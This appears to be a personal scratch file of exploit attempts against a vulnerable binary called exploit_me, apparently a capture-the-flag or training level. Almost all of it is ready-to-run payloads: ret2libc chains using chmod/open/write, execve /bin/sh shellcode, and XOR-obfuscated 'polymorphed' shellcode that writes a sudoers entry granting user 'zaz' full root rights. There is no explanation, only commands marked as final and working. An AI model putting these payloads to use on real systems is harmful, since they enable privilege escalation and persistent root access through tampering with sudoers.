chmod:					0xb7f09b00
open:					0xb7f09d00
write:					0xb7f0a270

# find values with gdb) find __libc_start_main,+99999999,<value>

ONE				(1):	0xb7e455ca
LENGTH			(21):	0xb7e456b3
MODE			(0777):	0xb7e46972
DEFAULT MODE	(0440):	0xb7e4ec7e
FD				(3):	0xb7e45705

$(python -c 'print "A"*140+"\x60\xb0\xe6\xb7"+"\xde\xad\xbe\xef"+"\x58\xcc\xf8\xb7"')

0xbffff690

# ENV EXPORT
export EXPLOIT_CONT="zaz ALL=(ALL:ALL) ALL" && export EXPLOIT_PATH="/etc/sudoers.d/README"

"$(python -c 'print "\x00"*140+"\x60\xb0\xe6\xb7"+"\xde\xad\xbe\xef"+"\x58\xcc\xf8\xb7"+"/etc/sudoers.d/README\x00"+"zaz ALL=(ALL:ALL) ALL\x00"')"

0xbfffff42: EXPLOIT_CONT
0xbffffeda: EXPLOIT_PATH

chmod + open + PATH + MODE

0xb7f09b00  +      0xb7f09d00+         0xbffffeda+         0xb7e46972

$(python -c 'print "A"*140+"\x00\x9b\xf0\xb7"+"\xda\xfe\xff\xbf"+"\x72\x69\xe4\xb7"')

==================================================================================================================

0xbffff6e0

$(python -c 'print "A"*140+"\xe0\xf6\xff\xbf"+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"')

VALID COMMAND:
./exploit_me $(python -c 'print "A"*140+"\xff\xf6\xff\xbf"+"\x90"*2014+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"')

===== REAL SOLUTION ======

POLYMORPHED !!!!!!!
"\x31\xD2\xB2\x45\x52\x68\x45\x41\x44\x4D\x68\x2E\x64\x2F\x52\x68\x6F\x65\x72\x73\x68\x2F\x73\x75\x64\x68\x2F\x65\x74\x63\x89\xE3\x31\xC9\x66\xB9\xFF\x01\x31\xC0\xB0\x15\xCD\x80\x31\xD2\xB2\x45\x52\x68\x45\x41\x44\x4D\x68\x2E\x64\x2F\x52\x68\x6F\x65\x72\x73\x68\x2F\x73\x75\x64\x68\x2F\x65\x74\x63\x89\xE3\x31\xC9\xB1\x01\x31\xC0\xB0\x05\xCD\x80\x89\xC3\x31\xD2\xB2\x4C\x52\x68\x29\x20\x41\x4C\x68\x3A\x41\x4C\x4C\x68\x28\x41\x4C\x4C\x68\x41\x4C\x4C\x3D\x68\x7A\x61\x7A\x20\x89\xE1\x31\xD2\xB2\x15\x31\xC0\xB0\x04\xCD\x80\x31\xD2\xB2\x45\x52\x68\x45\x41\x44\x4D\x68\x2E\x64\x2F\x52\x68\x6F\x65\x72\x73\x68\x2F\x73\x75\x64\x68\x2F\x65\x74\x63\x89\xE3\x31\xC9\x66\xB9\x20\x01\x31\xC0\xB0\x0F\xCD\x80\x31\xC0\xB0\x01\x31\xDB\xCD\x80"

== PIFFED IRL==
r $(python -c 'print "A"*140+"\xff\xf6\xff\xbf"+"\x90"*2014+"\x6A\x45\x68\x45\x41\x44\x4D\x68\x2E\x64\x2F\x52\x68\x6F\x65\x72\x73\x68\x2F\x73\x75\x64\x68\x2F\x65\x74\x63\x89\xE3\xB9\xFF\x01\x00\x00\xB8\x0F\x00\x00\x00\xCD\x80\x6A\x45\x68\x45\x41\x44\x4D\x68\x2E\x64\x2F\x52\x68\x6F\x65\x72\x73\x68\x2F\x73\x75\x64\x68\x2F\x65\x74\x63\x89\xE3\xB9\x01\x00\x00\x00\xB8\x05\x00\x00\x00\xCD\x80\x89\xC3\x6A\x4C\x68\x29\x20\x41\x4C\x68\x3A\x41\x4C\x4C\x68\x28\x41\x4C\x4C\x68\x41\x4C\x4C\x3D\x68\x7A\x61\x7A\x20\x89\xE1\xBA\x15\x00\x00\x00\xB8\x04\x00\x00\x00\xCD\x80\x6A\x45\x68\x45\x41\x44\x4D\x68\x2E\x64\x2F\x52\x68\x6F\x65\x72\x73\x68\x2F\x73\x75\x64\x68\x2F\x65\x74\x63\x89\xE3\xB9\x20\x01\x00\x00\xB8\x0F\x00\x00\x00\xCD\x80\xB8\x01\x00\x00\x00\xBB\x00\x00\x00\x00\xCD\x80"')

0xbffff5ff

r $(python -c 'print "A"*140+"\xf0\xf5\xff\xbf"+"\x90"*16+"\x31\xD2\xB2\x45\x52\x68\x45\x41\x44\x4D\x68\x2E\x64\x2F\x52\x68\x6F\x65\x72\x73\x68\x2F\x73\x75\x64\x68\x2F\x65\x74\x63\x89\xE3\x31\xC9\x66\xB9\xFF\x01\x31\xC0\xB0\x5A\xCD\x80\x31\xD2\xB2\x45\x52\x68\x45\x41\x44\x4D\x68\x2E\x64\x2F\x52\x68\x6F\x65\x72\x73\x68\x2F\x73\x75\x64\x68\x2F\x65\x74\x63\x89\xE3\x31\xC9\xB1\x01\x31\xC0\xB0\x05\xCD\x80\x89\xC3\x31\xD2\x66\xBA\x4C\x0A\x52\x68\x29\x20\x41\x4C\x68\x3A\x41\x4C\x4C\x68\x28\x41\x4C\x4C\x68\x41\x4C\x4C\x3D\x68\x7A\x61\x7A\x20\x89\xE1\x31\xD2\xB2\x16\x31\xC0\xB0\x04\xCD\x80\x31\xD2\xB2\x45\x52\x68\x45\x41\x44\x4D\x68\x2E\x64\x2F\x52\x68\x6F\x65\x72\x73\x68\x2F\x73\x75\x64\x68\x2F\x65\x74\x63\x89\xE3\x31\xC9\x66\xB9\x20\x01\x31\xC0\xB0\x5A\xCD\x80\x31\xC0\xB0\x01\x31\xDB\xCD\x80"')

0xbffff8c6 WHERE TO JUMP IN
0xbffff8e8 GDB ADDRESS FOR STRING INSPECTION

./exploit_me $(python -c 'print "A"*140+"\xff\xf5\xff\xbf"+"\x90"*2014+"\x31\xD2\xB2\x45\x52\x68\x45\x41\x44\x4D\x68\x2E\x64\x2F\x52\x68\x6F\x65\x72\x73\x68\x2F\x73\x75\x64\x68\x2F\x65\x74\x63\x89\xE3\x31\xC9\x66\xB9\xFF\x01\x31\xC0\xB0\x5A\xCD\x80\x31\xD2\xB2\x45\x52\x68\x45\x41\x44\x4D\x68\x2E\x64\x2F\x52\x68\x6F\x65\x72\x73\x68\x2F\x73\x75\x64\x68\x2F\x65\x74\x63\x89\xE3\x31\xC9\xB1\x01\x31\xC0\xB0\x05\xCD\x80\x89\xC3\x31\xD2\x66\xBA\x4C\x0A\x52\x68\x29\x20\x41\x4C\x68\x3A\x41\x4C\x4C\x68\x28\x41\x4C\x4C\x68\x41\x4C\x4C\x3D\x68\x7A\x61\x7A\x20\x89\xE1\x31\xD2\xB2\x16\x31\xC0\xB0\x04\xCD\x80\x31\xD2\xB2\x45\x52\x68\x45\x41\x44\x4D\x68\x2E\x64\x2F\x52\x68\x6F\x65\x72\x73\x68\x2F\x73\x75\x64\x68\x2F\x65\x74\x63\x89\xE3\x31\xC9\x66\xB9\x20\x01\x31\xC0\xB0\x5A\xCD\x80\x31\xC0\xB0\x01\x31\xDB\xCD\x80"')

====FINAL WORKING HOLY SHIT====

./exploit_me $(python -c 'print "A"*140+"\xff\xf5\xff\xbf"+"\x90"*2014+"\x31\xD2\xB2\x45\x52\x68\x45\x41\x44\x4D\x68\x2E\x64\x2F\x52\x68\x6F\x65\x72\x73\x68\x2F\x73\x75\x64\x68\x2F\x65\x74\x63\x89\xE3\x31\xC9\x66\xB9\xFF\x01\x31\xC0\xB0\x5A\xCD\x80\x31\xD2\xB2\x45\x52\x68\x45\x41\x44\x4D\x68\x2E\x64\x2F\x52\x68\x6F\x65\x72\x73\x68\x2F\x73\x75\x64\x68\x2F\x65\x74\x63\x89\xE3\x31\xC9\xB1\x01\x31\xC0\xB0\x05\xCD\x80\x89\xC3\xBA\x2A\x6C\x45\x66\x81\xF2\x66\x66\x66\x66\x52\xBA\x4F\x46\x27\x2A\x81\xF2\x66\x66\x66\x66\x52\x68\x3A\x41\x4C\x4C\x68\x28\x41\x4C\x4C\x68\x41\x4C\x4C\x3D\xBA\x1C\x07\x1C\x46\x81\xF2\x66\x66\x66\x66\x52\x89\xE1\x31\xD2\xB2\x17\x31\xC0\xB0\x04\xCD\x80\x31\xD2\xB2\x45\x52\x68\x45\x41\x44\x4D\x68\x2E\x64\x2F\x52\x68\x6F\x65\x72\x73\x68\x2F\x73\x75\x64\x68\x2F\x65\x74\x63\x89\xE3\x31\xC9\x66\xB9\x20\x01\x31\xC0\xB0\x5A\xCD\x80\x31\xC0\xB0\x01\x31\xDB\xCD\x80"')

====PIMPED====

./exploit_me $(python -c 'print "A"*140+"\x10\xf6\xff\xbf"+"\x90"*2014+"\x31\xD2\xB2\x45\x52\xBA\xDC\xD8\xDD\xD4\x81\xF2\x99\x99\x99\x99\x52\xBA\xB7\xFD\xB6\xCB\x81\xF2\x99\x99\x99\x99\x52\xBA\xF6\xFC\xEB\xEA\x81\xF2\x99\x99\x99\x99\x52\x68\x2F\x73\x75\x64\xBA\xB6\xFC\xED\xFA\x81\xF2\x99\x99\x99\x99\x52\x89\xE3\x31\xC9\x66\xB9\xFF\x01\x31\xC0\xB0\x0F\xCD\x80\x31\xD2\xB2\x45\x52\xBA\xDC\xD8\xDD\xD4\x81\xF2\x99\x99\x99\x99\x52\xBA\xB7\xFD\xB6\xCB\x81\xF2\x99\x99\x99\x99\x52\xBA\xF6\xFC\xEB\xEA\x81\xF2\x99\x99\x99\x99\x52\x68\x2F\x73\x75\x64\xBA\xB6\xFC\xED\xFA\x81\xF2\x99\x99\x99\x99\x52\x89\xE3\x31\xC9\xB1\x01\x31\xC0\xB0\x05\xCD\x80\x89\xC3\xBA\x2A\x6C\x45\x66\x81\xF2\x66\x66\x66\x66\x52\xBA\x4F\x46\x27\x2A\x81\xF2\x66\x66\x66\x66\x52\x68\x3A\x41\x4C\x4C\x68\x28\x41\x4C\x4C\x68\x41\x4C\x4C\x3D\xBA\x1C\x07\x1C\x46\x81\xF2\x66\x66\x66\x66\x52\x89\xE1\x31\xD2\xB2\x17\x31\xC0\xB0\x04\xCD\x80\x31\xD2\xB2\x45\x52\xBA\xDC\xD8\xDD\xD4\x81\xF2\x99\x99\x99\x99\x52\xBA\xB7\xFD\xB6\xCB\x81\xF2\x99\x99\x99\x99\x52\xBA\xF6\xFC\xEB\xEA\x81\xF2\x99\x99\x99\x99\x52\x68\x2F\x73\x75\x64\xBA\xB6\xFC\xED\xFA\x81\xF2\x99\x99\x99\x99\x52\x89\xE3\x31\xC9\x66\xB9\x20\x01\x31\xC0\xB0\x0F\xCD\x80\x31\xC0\xB0\x01\x31\xDB\xCD\x80"')

./exploit_me $(python -c 'print "A"*140+"\x10\xf6\xff\xbf"+"\x90"*2014+"\x31\xD2\xB2\x45\x52\xBA\xDC\xD8\xDD\xD4\x81\xF2\x99\x99\x99\x99\x52\xBA\xB7\xFD\xB6\xCB\x81\xF2\x99\x99\x99\x99\x52\xBA\xF6\xFC\xEB\xEA\x81\xF2\x99\x99\x99\x99\x52\x68\x2F\x73\x75\x64\xBA\xB6\xFC\xED\xFA\x81\xF2\x99\x99\x99\x99\x52\x89\xE3\x31\xC9\x66\xB9\xFF\x01\x31\xC0\xB0\x0F\xCD\x80\x31\xD2\xB2\x45\x52\xBA\xDC\xD8\xDD\xD4\x81\xF2\x99\x99\x99\x99\x52\xBA\xB7\xFD\xB6\xCB\x81\xF2\x99\x99\x99\x99\x52\xBA\xF6\xFC\xEB\xEA\x81\xF2\x99\x99\x99\x99\x52\x68\x2F\x73\x75\x64\xBA\xB6\xFC\xED\xFA\x81\xF2\x99\x99\x99\x99\x52\x89\xE3\x31\xC9\xB1\x01\x31\xC0\xB0\x05\xCD\x80\x89\xC3\xBA\x2A\x6C\x45\x66\x81\xF2\x66\x66\x66\x66\x52\xBA\x4F\x46\x27\x2A\x81\xF2\x66\x66\x66\x66\x52\x68\x3A\x41\x4C\x4C\x68\x28\x41\x4C\x4C\x68\x41\x4C\x4C\x3D\xBA\x1C\x07\x1C\x46\x81\xF2\x66\x66\x66\x66\x52\x89\xE1\x31\xD2\xB2\x17\x31\xC0\xB0\x04\xCD\x80\x31\xD2\xB2\x45\x52\xBA\xDC\xD8\xDD\xD4\x81\xF2\x99\x99\x99\x99\x52\xBA\xB7\xFD\xB6\xCB\x81\xF2\x99\x99\x99\x99\x52\xBA\xF6\xFC\xEB\xEA\x81\xF2\x99\x99\x99\x99\x52\x68\x2F\x73\x75\x64\xBA\xB6\xFC\xED\xFA\x81\xF2\x99\x99\x99\x99\x52\x89\xE3\xB9\xB9\x98\x99\x99\x81\xF1\x99\x99\x99\x99\x31\xC0\xB0\x0F\xCD\x80\x31\xC0\xB0\x01\x31\xDB\xCD\x80"')

=== END PIMPED ===
./exploit_me $(python -c 'print "A"*140+"\xff\xf6\xff\xbf"+"\x90"*2014+"\x31\xD2\xB2\x45\x52\xBA\xDC\xD8\xDD\xD4\x81\xF2\x99\x99\x99\x99\x52\xBA\xB7\xFD\xB6\xCB\x81\xF2\x99\x99\x99\x99\x52\xBA\xF6\xFC\xEB\xEA\x81\xF2\x99\x99\x99\x99\x52\x68\x2F\x73\x75\x64\xBA\xB6\xFC\xED\xFA\x81\xF2\x99\x99\x99\x99\x52\x89\xE3\x31\xC9\x66\xB9\xFF\x01\x31\xC0\xB0\x0F\xCD\x80\x31\xD2\xB2\x45\x52\xBA\xDC\xD8\xDD\xD4\x81\xF2\x99\x99\x99\x99\x52\xBA\xB7\xFD\xB6\xCB\x81\xF2\x99\x99\x99\x99\x52\xBA\xF6\xFC\xEB\xEA\x81\xF2\x99\x99\x99\x99\x52\x68\x2F\x73\x75\x64\xBA\xB6\xFC\xED\xFA\x81\xF2\x99\x99\x99\x99\x52\x89\xE3\x31\xC9\xB1\x01\x31\xC0\xB0\x05\xCD\x80\x89\xC3\xBA\x2A\x6C\x45\x66\x81\xF2\x66\x66\x66\x66\x52\xBA\x4F\x46\x27\x2A\x81\xF2\x66\x66\x66\x66\x52\x68\x3A\x41\x4C\x4C\x68\x28\x41\x4C\x4C\x68\x41\x4C\x4C\x3D\xBA\x1C\x07\x1C\x46\x81\xF2\x66\x66\x66\x66\x52\x89\xE1\x31\xD2\xB2\x17\x31\xC0\xB0\x04\xCD\x80\x31\xD2\xB2\x45\x52\xBA\xDC\xD8\xDD\xD4\x81\xF2\x99\x99\x99\x99\x52\xBA\xB7\xFD\xB6\xCB\x81\xF2\x99\x99\x99\x99\x52\xBA\xF6\xFC\xEB\xEA\x81\xF2\x99\x99\x99\x99\x52\x68\x2F\x73\x75\x64\xBA\xB6\xFC\xED\xFA\x81\xF2\x99\x99\x99\x99\x52\x89\xE3\xB9\xB9\x98\x99\x99\x81\xF1\x99\x99\x99\x99\x31\xC0\xB0\x0F\xCD\x80\x31\xC0\xB0\x01\x31\xDB\xCD\x80"')

./exploit_me $(python -c 'print "A"*140+"\xff\xf6\xff\xbf"+"\x90"*2014+"\x31\xD2\xB2\x45\x52\xBA\xDC\xD8\xDD\xD4\x81\xF2\x99\x99\x99\x99\x52\xBA\xB7\xFD\xB6\xCB\x81\xF2\x99\x99\x99\x99\x52\xBA\xF6\xFC\xEB\xEA\x81\xF2\x99\x99\x99\x99\x52\x68\x2F\x73\x75\x64\xBA\xB6\xFC\xED\xFA\x81\xF2\x99\x99\x99\x99\x52\x89\xE3\x31\xC9\x66\xB9\xFF\x01\x31\xC0\xB0\x0F\xCD\x80\x31\xD2\xB2\x45\x52\xBA\xDC\xD8\xDD\xD4\x81\xF2\x99\x99\x99\x99\x52\xBA\xB7\xFD\xB6\xCB\x81\xF2\x99\x99\x99\x99\x52\xBA\xF6\xFC\xEB\xEA\x81\xF2\x99\x99\x99\x99\x52\x68\x2F\x73\x75\x64\xBA\xB6\xFC\xED\xFA\x81\xF2\x99\x99\x99\x99\x52\x89\xE3\x31\xC9\xB1\x01\x31\xC0\xB0\x05\xCD\x80\x89\xC3\xBA\x2A\x6C\x45\x66\x81\xF2\x66\x66\x66\x66\x52\xBA\x4F\x46\x27\x2A\x81\xF2\x66\x66\x66\x66\x52\x68\x3A\x41\x4C\x4C\x68\x28\x41\x4C\x4C\x68\x41\x4C\x4C\x3D\xBA\x1C\x07\x1C\x46\x81\xF2\x66\x66\x66\x66\x52\x89\xE1\x31\xD2\xB2\x17\x31\xC0\xB0\x04\xCD\x80\x31\xD2\xB2\x45\x52\xBA\xDC\xD8\xDD\xD4\x81\xF2\x99\x99\x99\x99\x52\xBA\xB7\xFD\xB6\xCB\x81\xF2\x99\x99\x99\x99\x52\xBA\xF6\xFC\xEB\xEA\x81\xF2\x99\x99\x99\x99\x52\x68\x2F\x73\x75\x64\xBA\xB6\xFC\xED\xFA\x81\xF2\x99\x99\x99\x99\x52\x89\xE3\xB9\xB9\x98\x99\x99\x81\xF1\x99\x99\x99\x99\x31\xC0\xB0\x0F\xCD\x80\x31\xC0\xB0\x01\x31\xDB\xCD\x80"')

=== PIMPED OBFUSCATED FINAL COMMAND ===

./exploit_me $(python -c 'print "A"*140+"\xff\xf6\xff\xbf"+"\x90"*2014+"\x31\xD2\xB2\x45\x52\xBA\xDC\xD8\xDD\xD4\x81\xF2\x99\x99\x99\x99\x52\xBA\xB7\xFD\xB6\xCB\x81\xF2\x99\x99\x99\x99\x52\xBA\xF6\xFC\xEB\xEA\x81\xF2\x99\x99\x99\x99\x52\x68\x2F\x73\x75\x64\xBA\xB6\xFC\xED\xFA\x81\xF2\x99\x99\x99\x99\x52\x89\xE3\x31\xC9\x66\xB9\xFF\x01\x31\xC0\xB0\x0F\xCD\x80\x31\xD2\xB2\x45\x52\xBA\xDC\xD8\xDD\xD4\x81\xF2\x99\x99\x99\x99\x52\xBA\xB7\xFD\xB6\xCB\x81\xF2\x99\x99\x99\x99\x52\xBA\xF6\xFC\xEB\xEA\x81\xF2\x99\x99\x99\x99\x52\x68\x2F\x73\x75\x64\xBA\xB6\xFC\xED\xFA\x81\xF2\x99\x99\x99\x99\x52\x89\xE3\x31\xC9\xB1\x01\x31\xC0\xB0\x05\xCD\x80\x89\xC3\xBA\x2A\x6C\x45\x66\x81\xF2\x66\x66\x66\x66\x52\xBA\x4F\x46\x27\x2A\x81\xF2\x66\x66\x66\x66\x52\x68\x3A\x41\x4C\x4C\x68\x28\x41\x4C\x4C\x68\x41\x4C\x4C\x3D\xBA\x1C\x07\x1C\x46\x81\xF2\x66\x66\x66\x66\x52\x89\xE1\x31\xD2\xB2\x17\x31\xC0\xB0\x04\xCD\x80\x31\xD2\xB2\x45\x52\xBA\xDC\xD8\xDD\xD4\x81\xF2\x99\x99\x99\x99\x52\xBA\xB7\xFD\xB6\xCB\x81\xF2\x99\x99\x99\x99\x52\xBA\xF6\xFC\xEB\xEA\x81\xF2\x99\x99\x99\x99\x52\x68\x2F\x73\x75\x64\xBA\xB6\xFC\xED\xFA\x81\xF2\x99\x99\x99\x99\x52\x89\xE3\xB9\xB9\x98\x99\x99\x81\xF1\x99\x99\x99\x99\x31\xC0\xB0\x0F\xCD\x80\x31\xD2\x52\x68\x57\x4E\x45\x44\x68\x33\x31\x6D\x50\x68\x35\x3B\x31\x3B\x68\x1B\x63\x1B\x5B\x31\xDB\xB3\x01\x89\xE1\x31\xD2\xB2\x11\x31\xC0\xB0\x04\xCD\x80\x31\xC0\xB0\x01\x31\xDB\xCD\x80"')
